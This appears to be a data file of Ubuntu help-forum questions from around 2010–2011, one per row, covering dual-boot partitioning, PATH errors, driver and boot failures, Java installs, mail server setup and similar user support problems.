24640	partitions for dual boot install with windows	following is the layout of the current partitions of my single hard drive viewed from windows 7 : c : has windows 7 system files and my personal data ; q : for lenovo recovery ; system_drv : for windows boot files ; my goals are : to create another partition d : for my personal data , and dedicate c : for windows system files and applications only . to install ubuntu alongside windows . d : will be shared between the two oses . my questions are : is it correct that the free space generated from shrinking c : will only be able to create an extended partition , since there are already 3 primary partitions ? so must d : be one logical partition on the extended partition , just as the partitions for ubuntu will be ? will this be bad sometime ? if yes , other better solutions ? what are the good utilities to accomplish the partition tasks ? can ubuntu installer solely handle them ? or better to have some of the jobs done in windows with some recommended softwares ? thanks and regards !
24646	skype shows a blank window on the webcam part what could be the problem ?	the other party is sending their webcam view and i am sending mine , so that they can see everything fine , but i only can see a blank window . when enabling the `` show my webcam '' it shows for a few milliseconds but then just disappears . it happens with two different graphic cards , it 's very unlikely to be graphics card related . any ideas on what could be the problem ?
24660	how can i install ubuntu using the alternate disk from usb-stick ?	i created the stick with unetbootin . the stick boots fine , but after language selection the installer says that cd-rom is not in the drive . how can i get around that ? the desktop disk works fine , but i ca n't use it . i can not use usb-creator-gtk since it gives me segmentation faults for some reason ... so i have to stick with unetbootin .
24667	.mov file not video playing	i have installed ubuntu-restricted-extras but when i play a movie such as this http : //media.railscasts.com/videos/250_authentication_from_scratch.mov it plays the sound but the video is just a black screen . it does the same in several different media players vlc , totem , bansheee . the bbc iplayer and youtube work fine . how do i troubleshoot this ? thanks
24680	how can i automate creation of videos from an image and an audio track ?	there are many videos on sites such as youtube that simply contain album art and an audio track . this is easy to do with tools such as openshot or pitivi but it is time consuming . is there a script or command that can be used to automate this process ?
24681	installation is unusably slow , booting from live usb	here are the screens . i really need a solution . i used these instructions http : //www.ubuntu.com/netbook/get-ubuntu/download after about 15 minutes , i see ubuntu information on the screen , but then it takes another 15-30 minutes to show me the first screen of the installation . it never ends ... what 's the problem ?
24685	need help fixing a strange path error in bash	i have two executable files i downloaded and am trying to add to the path . they are located in /home/user/folder and the specific files are /home/user/folder/app1 /home/user/folder/app2 both app1 and app2 have the executable flag set to all ( user , group , other ) . i can execute the files if i am in /home/user/folder and i execute these commands ./app1 ./app2 however i ca n't run them from elsewhere . i added this line to my .profile path= '' $ path : /home/user/folder '' and then sourced the path with . /home/user/.profile and i can see app1 and app2 when i use command completion ( pressing tab ) . however here is what happens when i try to run app1 or app2 with the following commands ( the following only shows 'app1 ' but the same is true of 'app2 ' ) user @ comp : ~ $ app1 -bash : app1 : command not found user @ comp : ~ $ /home/user/folder/app1 -bash : app1 : command not found user @ comp : ~/folder $ ./app1 ( program runs ) i 'm stumped : ) , i must have missed something simple . thanks for your help ! ! update ok , i found some errors in the path which i think i fixed , but now it 's not running in any case - which for some reason i think is a step forward . thanks for suggesting the following steps , here is their output : user @ computer : ~ $ echo $ path /usr/share/fsl/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/bin : /usr/bin : /bin : /usr/bin/x11 : /usr/games : /usr/local/matlab/bin : /usr/local/voxbo/bin : /usr/local/itt/idl64/bin : /usr/local/afni/bin/ : /usr/local/mricron : /usr/lib/voxbo/bin : /home/user/folder : /usr/local/bin : /usr/bin : /bin : /usr/bin/x11/ : /usr/games/ : /usr/local/matlab/bin : /usr/local/voxbo/bin/ : /usr/local/itt/idl64/bin : /usr/local/afni/bin/ : /usr/local/mricron/ user @ computer : ~ $ typeset -p path declare -x path= '' /usr/share/fsl/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/bin : /usr/bin : /bin : /usr/bin/x11 : /usr/games : /usr/local/matlab/bin : /usr/local/voxbo/bin : /usr/local/itt/idl64/bin : /usr/local/afni/bin/ : /usr/local/mricron : /usr/lib/voxbo/bin : /home/user/folder : /usr/local/bin : /usr/bin : /bin : /usr/bin/x11/ : /usr/games/ : /usr/local/matlab/bin : /usr/local/voxbo/bin/ : /usr/local/itt/idl64/bin : /usr/local/afni/bin/ : /usr/local/mricron/ '' user @ computer : ~ $ type app1 app1 is /home/user/folder/app1 user @ computer : ~ $ type app2 app2 is /home/user/folder/app2 user @ computer : ~ $ app1 bash : /home/user/folder/app1 : no such file or directory user @ computer : ~ $ app2 bash : /home/user/folder/app2 : no such file or directory user @ computer : ~ $ /home/user/folder/app1 bash : /home/user/folder/app1 : no such file or directory user @ computer : ~ $ /home/user/folder/app2 bash : /home/user/folder/app2 : no such file or directory user @ computer : ~ $ cd /home/user/folder user @ computer : ~/folder $ app1 bash : /home/user/folder/app1 : no such file or directory user @ computer : ~/folder $ ./app1 bash : ./app1 : no such file or directory user @ computer : ~/folder $ ./app2 bash : ./app2 : no such file or directory user @ computer : ~/folder $ ls -l total 29384 -rwxr-xr-x 1 user user 14949776 2011-02-03 11:09 app1 -rwxr-xr-x 1 user user 15137300 2011-02-03 11:10 app2 user @ computer : ~/folder $ thanks for everyone 's input !
24687	how to install gnome 3 in ubuntu 10.04 lts ?	someone can to explain how to install gnome3-session in ubuntu 10.04 lts ? thanks ! ! ! sorry to my english : - )
24694	btrfs default file system for natty ?	will btrfs be the default file system in natty narwhal ?
24697	my screen is disabled for a long time after i click `` install to harddisk ''	yes my laptop lcd screen is disabled and maybe black after i click the install to hard disk option on a usb stick . this worked well on another laptop pc , but not on this . i tried to set acpi=off i reset the bios settings
24705	unable to boot into windows 7 after ubuntu 10.04 update	i 'm running a dual boot windows 7 / ubuntu 10.04 system . i ran the ubuntu update last night , and today when i tried to boot into windows 7 , it goes straight to the windows recovery on my acer 5517 laptop . i 've spent the entire day trying to resolve this with no success . i used my windows 7 recovery disk to reset the mbr , but that did n't help . the system was working perfectly prior to the update . it appears that now grub is pointing to the recovery partition rather than the primary partition . any help will be greatly appreciated . i do n't relish the idea of reformatting and starting from scratch .
24709	ubiquity crashes when installing from cd	i did n't want to take any risks so i ordered a cd from canonical to get ubuntu . thing is , another cd was given to me about 2 days before the cd from canonical got to me , so i installed ubuntu 10.10 but there was a problem with the login screen ( when the ubuntu logo should be displayed , it was n't , instead it would just say `` ubuntu 10.10 '' ) so i decided to reinstall ubuntu 10.10 with the cd that arrived a few days later . whenever it 's finishing the installation , the installer ( ubiquity ) crashes , or sometimes it gets to the part where the boot loader should be installed and for some reason it is unable to install the boot loader ( if i choose not to install it , i do n't get how to start ubuntu , since you have to reboot my laptop after the installation is over ) . i 'm currently running ubuntu 10.10 from the cd i ordered , since i have no other os on this laptop .
24711	what credentials do you enter to use a network printer ?	i 've added a network printer . both the host and guest are ubuntu . the printer added fine , but the system asks for authentication when i try to print . i typed the host 's ( the account that installed the printer ) username/password , did n't work . i typed the guest 's username/password , it did n't work either . what username and password do i enter ?
24712	retaining bash prompt colors when starting a screen session	when i ssh into a ubuntu lucid box the prompt is all pretty , with colors . everything is the default , as far as i know . here 's my $ ps1 outside screen : \ [ \e ] 0 ; \u @ \h : \w\a\ ] $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ dev\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ but then once i start screen up the colors go away . everything else is fine , and my screen can support colors ( notice that the . and .. in this ls -al are blue ) but the prompt is n't . in theory everything should be exactly the same . $ ps1 inside screen : $ { debian_chroot : + ( $ debian_chroot ) } \u @ dev : \w\ $ edit : this is just plain vanilla screen .
24713	watch syntax help	in my systems programming class , there are weekly programming experiments , and i 'm having trouble with the current one . the objective is to write a c program that slowly writes a string of text to a file , metered by usleep ( ) in a 100 count for loop . the goal of the experiment is to observe the file size buffer in action via the watch command . however , i ca n't get it to work using watch -d ./output what syntax do i need for the watch command to see the changes made to the file size ?
24717	netbeans ( 6.9.1 ) installation error	while installing netbeans-6.9.1 i got following error : ./netbeans-6.9.1-ml-linux.sh : 1897 : syntax error : `` ( `` unexpected ( expecting `` ; ; '' ) what may be the reason ? i have downloaded the installer from netbeans.org .
24718	lampp on ubuntu - http.conf	hey , i 've got lampp installed in ubuntu and i want to get .htaccess working but i do n't know how . and , yes , i have searched all over google . cheers ,
24722	no sound after boot	whenever i start ubuntu , the sound is missing and i have to key in the command alsamixer ( where the third slider is zero ) and increase the volume manually . how can i fix this ? ps : i do n't mean startup sound i mean that the sound is missing altogather from the songs/ movies everything .
24726	'permission denied ' while installing 32-bit java ( jdk/jre ) on 64-bit ubuntu	i use ubuntu 10.10 server as test server for a java program . linux sugam 2.6.35-22-server # 35-ubuntu smp sat oct 16 22:02:33 utc 2010 x86_64 gnu/linux ubuntu 10.10 since it is a test server and we like to see our application to work in both , 64-bit and 32-bit java , i like to have openjdk ( 32-bit and 64-bit ) and java se ( 32-bit and 64-bit ) , ( total 4 instances ) installed on the server . i could install 64-bit easily and have the following java versions : $ /app/java64bit/jre1.6.0_23/bin/java -version java version `` 1.6.0_23 '' java ( tm ) se runtime environment ( build 1.6.0_23-b05 ) java hotspot ( tm ) 64-bit server vm ( build 19.0-b09 , mixed mode ) $ /usr/lib/jvm/java-6-openjdk/jre/bin/java -version java version `` 1.6.0_20 '' openjdk runtime environment ( icedtea6 1.9.2 ) ( 6b20-1.9.2-0ubuntu2 ) openjdk 64-bit server vm ( build 19.0-b09 , mixed mode ) but i am unable to install 32-bit java on this 64-bit machine . i have correct binaries ( cksum and md5sum validated ) . on unpacking i get the following error for 32-bit version : $ ./jre-6u23-linux-i586.bin unpacking ... ./jre-6u23-linux-i586.bin : 56 : can not create install.sfx.12308 : permission denied checksumming ... /usr/bin/sum : install.sfx.12308 : no such file or directory [ : 83 : -ne : unexpected operator [ : 83 : -ne : unexpected operator chmod : can not access `install.sfx.12308 ' : no such file or directory extracting ... ./jre-6u23-linux-i586.bin : 86 : ./install.sfx.12308 : not found failed to extract the files . please refer to the troubleshooting section of the installation instructions on the download page for more information . is there a way to install 32-bit java on a 64-bit server ? any help appreciated .
24731	minimum to install for a visual web browser in ubuntu server	i have set up a machine with ubuntu server . some of the server software i want to run on it has web based user interfaces for setting it up et cetera . i know i could connect to it from a different machine which has a graphical user interface , but in this case i would rather do it on the box . so , from a fresh ubuntu server installation , what is the minimum i need to install to be able to launch a web browser i can use for this ? for example chromium , firefox or arora .
24732	failed update of 10.10 results in unbootable system	yesterday i performed an automatic security update suggested by the update manager on my virtualized ( with virtualbox on a windows 7 host ) ubuntu 10.10 installation . the update somehow failed and left me with an unbootable system . when i try to boot , i am told that various folders , files , and what not are missing . then the system drops into a busybox and leaves me with an ( initramfs ) prompt . this happens with all kernels i get offered by grub , although the error messages are quite different from kernel to kernel . well , the short of it is this : i do n't have the slightest idea on how to get back to a working system and this site is the final straw i 'm willing to grab . a complete disaster like this following an update initiated and executed by the system is unheard of in windows-land ; at least i have n't heard of it , yet , and therefore i am going to abandon ubuntu and linux altogeteher , if there is no remedy . regards , rsel
24733	configuration server problem after changing /tmp mountpoint : how to solve ?	i created a new partition on my hard drive because my /tmp partition was too small . i changed the mountpoint in /etc/fstab and rebooted . every time i reboot , i get the following error message at the login screen : there is a problem with the configuration server . ( /usr/lib/libgconf2-4/gconf-sanity-check-2 exited with status 256 ) when i log in , /tmp is mounted correctly and everything seems to work fine . when i reboot , the error shows again . when i change the /tmp mountpoint back to the old partition , the error message disappears . what could be causing this and how can i solve this issue ?
24736	how do i install ubuntu without making a cd or flash drive ?	i am currently running windows 7 on my laptop . i want to install ubuntu with windows 7 . i have downloaded the windows installer of ubuntu . can i install ubuntu without making a bootable cd or flash drive of ubuntu ?
24742	making my own custom ubuntu	i was wondering , is it possible to make my own customized version of linux based on ubuntu 10.10 ? i am thinking of calling it something different but i was wondering besides making a custom live cd i am talking about an linux that people can install on there computers using ubuntu installation method . i want to base it on something other than gnome but be able to install it latter on . thanks in advance , benny
24746	how to move both panels to the bottom in gnome ?	as everyone will know , in ubuntu gnome by default there is a panel at the top of the screen with a set of menus and icons and also one at the bottom with the window list etc . what i wanted to do was move both of these to the bottom , with the window list and the absolute bottom of the screen and the other panel just above it . so i set the alignment of both panels to 'bottom ' but this made the window list panel the highest up panel . i fixed this by manually moving everything between the panels and swapping it over which was fine , until i restarted my computer which resulted in them being swapped back over , so the window list is now above the other panel . is there a way to permanently set the window list to be the bottom ?
24749	how can i download or install all of the dictionaries ?	i find the dictionaries in /usr/share/dict/ quite useful . how do i download ( or install ) all of them , for every language , without having to install every language pack ? also , if the answer involves package management , how do i properly remove them again ?
24752	why is ruby version 1.9.2 named ruby1.9.1 ?	or in another words , why is n't there a separate ruby-1.9.2 package ? source info : http : //packages.ubuntu.com/maverick/ruby1.9.1
24768	how do i show a log analysis in splunk ?	i have made my ubuntu server a centralized log server ... i have splunk installed in the /opt directory of the ubuntu server . i have one of the another machines sending logs to this ubuntu server..in the splunk interface i have added in the network ports as udp port 514 ... and also have added in the `` file and directory '' /var/log . the client has also been configured properly ... how do i show analysis of the logs ? ?
24769	play video files in a local lan folder with kde	i 'm trying to play video files in a lan network folder from within dolphin . these are samba folders which i can access , delete files and write and copy from . the same video files play perfectly with any video player when i copy them to my local folder beforehand . any help ?
24770	gnome keyring keeps asking for a password that does n't exist	when ever i long into ubuntu , i 'm immediately presented with a dialogue that asks me to enter the password that will unlock gnome keyring , however i was never prompted to set this in the first place , and none of the passwords i 've tried are effective . how can i disable these popups and just have gnome keyring unlocked when i log in in the same way that encrypted home directories are automatically mounted upon log in . fwiw , i 'm set to auto log in , which may or may not be useful information . btw , i 've seen this question , and the accepted answer did n't work . i 'd rather not uninstall keyring update 1 : i 've disabled automatic login but it still appears .
24771	how to install a logitech webcam ?	i 'm having problems with installing a webcam : archive : /media/lws_2_0/setup.exe [ /media/lws_2_0/setup.exe ] end-of-central-directory signature not found . either this file is not the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /media/lws_2_0/setup.exe or /media/lws_2_0/setup.exe.zip , and can not find /media/lws_2_0/setup.exe.zip , period . how do i solve this ?
24780	how to make kde applications look native in gnome ?	is there a way to make kde applications ( like digikam ) look native in gnome ?
24789	how can i increase the maximum number of simultaneous users to log in to a server ?	i use ubuntu server 10.04 on a fairly good machine , with 2.40 dual-core processor and 2gb ram . my users login with ssh or samba . i have setup ldap with pam to sync user accounts between unix and samba . when i allowed about 90 users to login over ssh at once the server refused login for many users . i am using dropbear as ssh server . even samba logins failed for many users . i need to allow at least 100 users to login at once . is there anyway to do this ?
24795	how do i get the java plugin in firefox 3.6 working ?	i have ubuntu 10.10 . i needed the sun java so i added sun oracle as supplier of packages and installed java-6 . however , i have n't been able to persuade firefox to use this java for the browser . in fact i managed to turn off the original java plugin ( i ca n't remember exactly how ) and i ca n't see any way to re-enable it . ie . it does n't appear in the `` plugins '' page of the add-ons option . ( i 'm in firefox 3.6.13 ) any suggestions for how to re-enable java in ff 3.6 , and make sure it 's using the sun version ? thanks phil
24796	will windows recovery partition become useless when dual install with ubuntu ?	my laptop is lenovo with windows 7 . i was wondering if i dual install ubuntu , the windows recovery partition will be of no use any more ? i am confused because i heard of this and do n't understand why . thanks and regards !
24798	automatic shutdown / hibernation after x minutes in suspend ?	i have an embedded battery powered device running ubuntu and want to reduce power consumption . the idea is that if a user does not use a device for ca . 30 min . then the device will automatically shutdown or hibernate . is it possible to automatically shut down or hibernate ubuntu after spending x minutes in suspend ?
24805	get bottom panel back	i 'm trying avant window navigator ( awn ) and i would like to delete my bottom panel to test only the awn . but , if i do n't like it , is there a way to get my bottom panel back ?
24811	how to turn compiz on ?	i 've installed compiz with the applications- > ubuntu software center , but it does not change the way alt+tab animates . also , if i type `` compiz '' in the `` run application '' it hides all , and as i walk with the mouse everything gets back to the place , as if nothing had happened . how to turn compiz on ?
24812	how to activate notebook function keys ?	i have upgraded my `` compaq presarion cq60 '' notebook from ubuntu 10.04 to 10.10 . everything is fine , but the functional keys for brightness f7 & f8 are not working . it was well working with 10.04.how to solve this ?
24813	visual effects not working on my intel corporation 82915g/gv/910gl integrated video	my video card is intel corporation 82915g/gv/910gl integrated and the custom visual effects do n't work at all ! is it due to the vga ? how can i get visual effects to work ?
24826	how to make ubuntu 10.10 boot faster ?	hi , i m using ubuntu 10.10 64bit os . while booting in a black screen it shows blinking `` _ '' about 10 seconds . how can it be solved ?
24828	receive mail from any domain	i have a mail server whose domain name is `` vrk.com '' and a user named `` vinod '' in it ... all the mails send to `` vinod @ vrk.com '' comes into the mail box /home/vinod/mbox can i store mails addressed to `` blahblah @ yahoo.com '' in this same mail box i.e /home/vinod/mbox ... or into another catch all kind of user which catches all the mails regardless of the domain ? ? ? ? is it possible ... i am using postfix ... .
24829	how do i turn on ssl for test server ?	i have a lamp stack running . my the web root is /var/www . so if i go to http : //linux-server/some/page.php it renders the page located at /var/www/some/page.php if i use https i get page not found . i would like to enable ssl for all pages , so i can view any of these pages using either http or https . how can i do that ?
24842	opensource flow charting	i 'm looking for an application that drops output in a portable format , maybe export as an image file so i can flowchart some application designs and submit them to my boss for professional review . from what i 've seen dia is about the de-facto standard for linux flowcharting , but maybe some of you out there in askubuntu land have some other suggestions for me to examine . please keep in mind it has to offer a professional / attractive look on the final product . maybe some color coordination of the options ( logic structures are all purple , input statements are orange ... for example )
24845	how and where all is ubuntu.com using metalinks ?	i just came across metalink . the site says ubuntu uses this . i have never seen any download link at ubuntu with a .metalink file extension ( eg - ubuntu_x.yy-iso.metalink ) . also how is udpate manager getting its updates , is it by using multicast ? what is mechanism behind the updates ? how does automatic mirror selection works in ubuntu ?
24857	could not display `` network : /// '' error when browsing lan	every time i reboot and try to browse the local network i get this error , but if i press ok and try again it works just fine . it only happens once per reboot .
24858	does anybody know what happens to money spent in the ubuntu one music store ?	i remember reading on the canonical website around the launch of the ubuntu one music store that after revenue was divided between canonical , 7 digital and the artists involved that all profit or a significant percentage would be donated to a charity . this information has either disappeared from their website or my detective skills have failed me once more . does anybody happen to understand the break down of revenue generated by the ubuntu one music store or even know where to find this information . also it would be useful to know which charity benefits from this . ( not that that would impact upon my purchases or send me running to itunes . ; ) promise )
24860	what is the best tool to sync browser passwords and bookmarks ?	sadly , everything i 've tried so far has been painful to manage between two computers , ( even between different browsers on the same computer ) . so , right now i have different aggregations of bookmarks passwords in xmarks , delicious , google bookmarks , firefox sync , text files , and in figaro password manager ( fpm2 ) . i 've also tried to use bindwood in the past . what i would like to do is merge all bookmarks and passwords into some solution that actually works either with tools available under ubuntu , or with a browser-based tool ( addon/plugin/extension ) which works between between google-chrome/chromium , and firefox . it would be ideal if there was an ability to send and store passwords encrypted ( if not on my own server ) . whatever the method , i need the ability to have import from existing sources . ( it does n't have to be pretty , just repeatable . ) it 's possible that some things i 've ruled out are now workable ( e.g. , xmarks broke for me at one point because i hit their bookmark limit for the server/account , and bindwood , firefox sync were firefox only ) .
24866	install quickbooks premier 2010	i have been trying to get quickbooks premier 2010 to run in wine . i ca n't do it . i am hoping that there may be someone who has been successful in installing various apps using wine . i am currently running windows 7 through virtual box , but i am disappointed with the performance . and it seems to be a little inconvenient .
24867	how do i remove the kde 4 plasma tool box/cashew icon from the desktop ?	i 'm looking to remove the `` tool box '' icon in the upper right hand corner of my kde 4 desktop , but ca n't find any configuration setting anywhere to do so . i 'm new to kde 4 , so it 's quite possible i just have n't found that setting yet . is there any way to remove that icon from your desktop , or is it just a permanent , unmovable part of kde ?
24869	how can i get swell foop ( same gnome ) working ?	i 've always loved this game but after upgrading to ubuntu 10.10 the game was removed . naturally i went into the software center and reinstalled it . however now when i launch it , it just freezes and will not do anything . i eventually have to kill it . it shows this output in the terminal : ( seed:12453 ) : glib-gobject-critical ** : g_object_ref : assertion `` g_is_object ( object ) '' failed is there a known bug or something ? how can i get this working again ?
24871	disabling packages from the update manager	i 'm looking for ways to blacklist packages from being suggested for update by the update manager . reason : gdesklets for instance works for me with v0.36.1-3 , but the update manager keeps suggesting 0.36.1-4 . when i use update manager , i generally just scan the list of updates and click ok. hoever when some packages which i want to keep at a certain version are in the middle i tend to miss them . hence looking for a way to blacklist them for the purposes of the update manager . i have found such a blacklist to disable packages from the auto-update , but it only seems to work with auto-update ( fully unattended ) - the update manager still lists the package for update and ticks it by default , like all packages . any hints as to where i could find this feature - if it exists ?
24881	openoffice always print a copy for every page	openoffice in 10.10 always send a extra copy for each page in my document 's ( writer , calc ) on a hp laserjet 4250 and hp deskjet 3920 . i double check `` copies '' option and is set to 1 , but always send a extra copy .
24884	how do i view an outlook .msg file ?	i need to view a .msg file . it is an email from microsoft outlook . how can i do this in ubuntu ?
24886	can not access to internet after installing 11.04 alpha2	after installing 11.04 alpha2 , i can not access to internet . i use wireless lan . in network connection dialog , it seems to work well . but i can not access any webpages from webbrowser . even if i use direct ip address -so it is not dns problem . i can not download newer version from update-manager . it does n't work either . what should i check ? can i rollback the update ? i 'm so frustrated and regret .
24887	`` fatal error '' message during boot process	i 'm running ubuntu 10.10 with ati proprietary fglrx graphic drivers when i boot , i can see this very quick message appearing ; i do n't have time to read it : **fatal error ... ... ... ... ... ... ... ... ... ... ... .** ( & @ something i cant read ) i searched through the log file in /var/log/ in order to find what is wrong and i did find something in the /var/log/xorg.1.log : 21:31:08 [ 15.734 ] ( -- ) using vt number 1 [ 204.647 ] fatal server error : [ 204.647 ] xf86openconsole : vt_waitactive failed : interrupted system call [ 204.647 ] [ 204.647 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 204.647 ] please also check the log file at `` /var/log/xorg.1.log '' for additional information . [ 204.647 ] but this is already xorg.1.log . and there is a xorg.0.log also & xorg.0.log.old but it doesnt have any error in it . my system seems to work properly and it seems its not affected by this but how do i correct this message ? any suggestions ?
24889	reinstalling windows vista 64 bit	i really like ubuntu , but my family is used to windows and i would like to dual boot it but accidentally did a full install and now i just have ubuntu . is there any way to me to get back windows vista 64 bit ?
24893	boots to a totally blank screen after i installed some ati radeon card updates	i am using ubuntu 10.04 lts , dual boot with windows 7 on thinkpad t400 , i followed ubuntu update hints and installed some update for my ati radeon graphic card , but when i boot to ubuntu ( means i can still load grub ) , the screen goes to blank and no matter what key stroke , i can not get any responds . i ca n't even open a terminal . however when i hit the power button , the computer would pop out the ubuntu shutdown screen briefly and shut down . i figure out i should delete the updates package for my graphic card , but i do n't even get a chance to go to text terminal , please help me !
24899	tmp directory deleted , i can not login to the system	i missinput a command in a directory ( i do n't remember what it is . ) sudo rm -f -r tmp after that when i restart and log in , i can not login use the user i have delete the tmp . however , i can log in with user : root . can i resolve the problem ?
24900	installation of a package to a custom directory	is there any option to install a package to my home directory ( or /foo ) instead of system wide ? i am looking for options using apt-get or dpkg . something similar to -- prefix in a source compile . what i am looking for co-existing of different versions of openjdk for testing purposes .
24903	how to boot from an .iso file in grub2 ?	is there a way for doing this ?
24904	any way to remove totem but still have video thumbnails in nautilus ?	i prefer to use vlc because it never gives me problems while totem does . i 'd like to uninstall totem , so all file associations point to vlc . however i still want to have video thumbnails in nautilus .
24906	is ubuntu compatible with macbooks ?	is it possible to install and run ubuntu on a macbook ?
24914	should i reorder partitions regarding performance	i have in principal 3 big partitions on my netbook . one windows , one for shared files , one for ubuntu . i recently find out ( using hdparm ) the the hardisk seems to have much better perfomance on the first 2/3 ( ~ 60mb/s ) than on the last 1/3 ( ~ 40mb/s ) . i am thinking to delete the second partition and create new partitions for `` swap '' and / directly after windows . does this effort make sense ? i also wan na upgrade to 10.4/10.10 but keep the option to go back to the old system , so maybe i install ubuntu completely in a/this new partition ?
24916	how do i remap certain keys or devices ?	i 'm searching for a way to remap certain keys in ubuntu . i.e . i 'd like to change pgup to home or pgdown to end . does a built-in command or a tool exist reassign keys in ubuntu/gnome ?
24919	impossible to install ubuntu 10.10 dual boot with windows 7 on new acer desktop computer	my brother has a brand new acer desktop with windows 7 . i have done many installs ( 40+ ) of ubuntu starting with 8.10 , and have never run into this . i 've spent three hours trying to do a dual boot install of 10.10 . when you get to the place where you normally would choose to install as a dual boot or overwrite the existing information on the hard drive , that block is just blank . nothing . no choices even to do a manual partition setup . if you try to go on you get the message `` no root file system is defined . please correct this from the partitioning menu . '' but there is nothing in the partitioning menu . i tried a good 10.04 disc also . same thing happens with it . i ran a gparted live cd , and it shows the hard drive as sda with 3 partitions on the original . sda1 is a small partition called pqservice . sda2 is another small partition called system reserved , and gparted says it is the boot partition . sda3 is the main partation with the operating system ( windows 7 ) and all of the empty space . there is a little unallocated space at the very beginning and very end of the hard drive . if i go to places in the live cd , it shows a 640 gb hard disk called acer , but it also shows a 640 gb hard disk called system reserved . they are the same disk . there is just one hard drive . if you click properties in the system reserved 640 gb , it shows all information as unknown . i had to change the boot order in the bios in order to run the live cd . the hard drive instead of being listed as such is listed as raid : raid ready . something the way this computer is set up is preventing ubuntu from being able to identify the hard drive partitions at all to do an install , even if you were not doing a dual boot and just wanted to overwrite windows . is this a bug that needs reported ? this is a major problem for me and my brother , but also for ubuntu if new users want to ubuntu and find they can not install it .
24921	deluge 100 % cpu	from time to time deluge goes to 100 % cpu with no apparent reason , ( no active torrents ) . if i restart it the cpu goes to around 0 % has anyone else encountered that ? edit : lol , finally solved the bug ( after some investigating ) . in short it appears it 's caused by deluge using twisted.internet.run ( ) instead of gtk.main ( ) for it 's main loop , and then twisted.internet.run ( ) calling gobject.threads_init ( ) internally , which sets a sigchld handler , and ultimately it boils down to a bug in pygtk that is resoved by this patch : diff -- git a/gtk/gtk.override b/gtk/gtk.override index 75018f4..94309a6 100644 -- - a/gtk/gtk.override +++ b/gtk/gtk.override @ @ -1151,9 +1151,10 @ @ pygtk_main_watch_check ( gsource *source ) # ifdef have_pysignal_setwakeupfd pysignalwatchsource *real_source = ( pysignalwatchsource * ) source ; gpollfd *poll_fd = & real_source- > fd ; - int data_size = 0 ; + unsigned char dummy ; + gssize ret ; if ( poll_fd- > revents & g_io_in ) - data_size = read ( poll_fd- > fd , 0 , 1 ) ; + ret = read ( poll_fd- > fd , & dummy , 1 ) ; # endif state = pyg_gil_state_ensure ( ) ; now deluge works fine , and i understand that this patch fixes a similar bug in other programs that use pygtk as well .
24925	avoiding backing up system-managed files	i 'd like to do thorough backups , but want to avoid backing up files which can be replaced via apt . does this effectively just consist of omitting /usr , with the exception of /usr/local , as well as /lib* , from the backup ? do some backup apps provide this functionality ?
24935	wget downloads corrupt jpeg file	i 'm trying to use wget to automatically download a wallpaper . here is the command : wget http : //static.die.net/earth/mercator/1600.jpg however , if i try to open the resulting picture , it seems to say it has a bad magic number . by running file 1600.jpg , i get 1600.jpg : gif image data , version 89a , 1 x 1 . if i open it as a gif it does n't work either . it 's only 37 bytes too . it works perfectly fine if i view or download it through firefox . any ideas ?
24937	how do i set path variables for all users on a server ?	i just finished installing latex for my company 's ubuntu server that we all ssh into to use . at the end of the install it says this : add /usr/local/texlive/2010/texmf/doc/man to manpath , if not dynamically determined . add /usr/local/texlive/2010/texmf/doc/info to infopath . most importantly , add /usr/local/texlive/2010/bin/x86_64-linux to your path for current and future sessions . how do i do this so that these variables are set for all users on the system ? ( and yes , i have sudo permissions ) .
24940	enable mobile broadband found unchecked	i am a newer to ubuntu . in my network manager the link enable mobile broadband found unchecked.i can not enable it.so i can not connect my bsnl cdma 1x usb modem successfully .
24945	unallocated space with important data	i used gparted to convert a primary partition to extended one after copying the data to another partition . after having the extended partition i moved the data back . to my utter shock after a restart i found out that the new extended partition did convert into `` unallocated space '' . i tried installing testdisk . testdisk could identify the partition as a primary partition and not the newly created extended partition . so what should i do now ? i badly want the data back .
24946	how do i disable the drum beat sound on the login screen ?	i would have expected system ▸ administration ▸ login screen ▸ play login sound to control this , but unchecking it does not prevent the drum beat sound from playing .
24952	how to copy files into /usr/local/ ? ( permission denied )	i 'm still a little new to ubuntu and was wondering how i can copy files , in this case aptana studio , to /usr/local/ without being denied . is there a way to do it in terminal ? or a way to allow myself permission ? i should add that i am using 10.10 desktop edition , not server .
24953	using grep with pipe and ampersand to filter errors from find	i am using cygwin to find a file on the cygdrive . however i need to suppress the permission denied messages ( otherwise the results get hidden in the error messages ) . the following command works : find -name 'myfile . * ' | & grep -v `` permission denied '' i do n't understand why the ampersand needs to be put into this command , would have expected this to work but it does n't . find -name 'myfile . * ' | grep -v `` permission denied '' please explain the meaning of the ampersand .
24957	how to delete/disable gnome panels ? ( existing solutions not working . )	i would like to remove the gnome panel completely . i spend most of my time in a ( tmux ) terminal or a browser . synapse and a small hidden awn panel fit the rest of my needs . i have tried all recommended solutions including this ( found it a few places ) : how to delete gnome panel ? however it always comes back at log in . i have tried changing the required components > panel to avant-whatever as well as to empty . i have tried setting them both as default ( right click set as default ) . right now i just have the last panel set to transparent and auto hide , but it still tends to be annoying . what do i need to do to get rid of this damn thing ? clarification : using gconf-editor , gconftool2 , and/or ubuntu tweak to set /desktop/gnome/session/required_component/panel to avant-window-navigator is not working . the setting stays when i reboot , but the empty gnome panel sticks around .
24964	how well does ms word 2007 and ms power point 2007 work in wine ?	i would like to use install ubuntu for a brother , but he needs ms word and ms power point for work . open alternatives apart , how well does ms word 2007 and ms power point 2007 work in wine ?
